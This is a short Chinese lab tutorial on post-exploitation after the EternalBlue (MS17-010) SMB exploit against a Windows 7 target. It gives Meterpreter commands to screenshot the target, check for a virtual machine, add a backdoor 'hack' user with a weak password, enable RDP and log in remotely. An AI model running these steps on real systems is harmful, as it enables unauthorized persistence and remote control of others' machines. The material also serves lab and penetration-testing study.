后渗透之永恒之蓝提权远程连接

一、利用永恒之蓝（MS17-010）进行攻击

1. 环境搭建:kali、Windows 7，其中WIN7为靶机。
2. 永恒之蓝【Eternal Blue】爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
3. 关于“SMB” ，SMB协议[Server Message Block]是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，网上邻居也是SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP协议的139端口和TCP445端口。

二、进入攻击阶段

 拿到权限后，screenshot，截取目标当前屏幕。 

run post/windows/gather/checkvm

查看目标主机是否在虚拟机中。

 net user hack(用户名) 123456(密码) /add

添加用户hack到目标主机中。

net user 可以看到hack用户成功建立。

 run post/windows/manage/enable_rdp

开启桌面远程连接。

rdesktpo 192.168.x.x(目标IP)。

 出现其他用户，用hack登录。

 成功登入，远程控制。